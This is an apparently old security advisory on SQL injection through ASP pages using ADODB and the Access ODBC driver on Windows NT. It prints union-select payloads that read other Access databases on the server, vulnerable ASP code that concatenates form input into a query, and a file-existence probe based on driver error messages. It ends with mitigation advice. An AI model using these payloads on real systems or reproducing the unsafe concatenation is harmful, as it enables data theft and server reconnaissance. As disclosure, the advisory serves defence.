Vulnerability

SQL

Affected

WinNT

Description

Jess Lopez de Aguileta found the following. It was tested on:

- WinNT Spanish SP5
- Data Access 2.1
- Option Pack 4

The following SQL works in an ADODB connection inside ASP:

    select field1,field2 from table_DSN_DB where field1=21 union select address,path from \winnt\profiles\administrador\escritorio\report.mdb.scanner

The first statement (to the left of 'union') is the valid query. A DSN exists and points to the DB containing the table "table_DSN_DB". The second, appended query has no DSN pointing to it. For this example you may use a Retina scanner report. Obviously IUSR_Server must have ACL authorization to the file "report.mdb" for this to work.

Now think of typical code like this:

    ' Form input is concatenated directly into the SQL text
    set conect_to = Server.CreateObject("ADODB.Connection")
    conect_to.open "validDSN"
    SQLQuery = "select family,description from table where family=" & request.form("family_of_item")
    set lot_of_registers = conect_to.execute(SQLQuery)
    do while not lot_of_registers.EOF
        response.write(lot_of_registers.fields("family"))
        response.write(lot_of_registers.fields("description"))
        lot_of_registers.movenext
    loop

It would be easy to tweak this query to access any database on the NT box. The standard error report from IIS allows you to tune your query.

But there is more: you can check for the installation of vulnerable programs/scripts, because the driver's error message differs depending on whether the file exists.

If the file exists:

    select family,description from table where family=21 union select * from \autoexec.bat.mdb

    Microsoft OLE DB Provider for ODBC Drivers error '80004005'
    [Microsoft][ODBC Microsoft Access Driver] Unrecognized database format 'C:\AUTOEXEC.BAT'.

If the file does not exist:

    select family,description from table where family=21 union select * from \other_autoexec.bat.mdb

    Microsoft OLE DB Provider for ODBC Drivers error '80004005'
    [Microsoft][ODBC Microsoft Access Driver] Could not find file 'C:\other_autoexec.bat'.

Solution

- Check the ACLs on all your Access databases on the NT box.
- Check ALL the input from any form that could be used to construct a SQL query.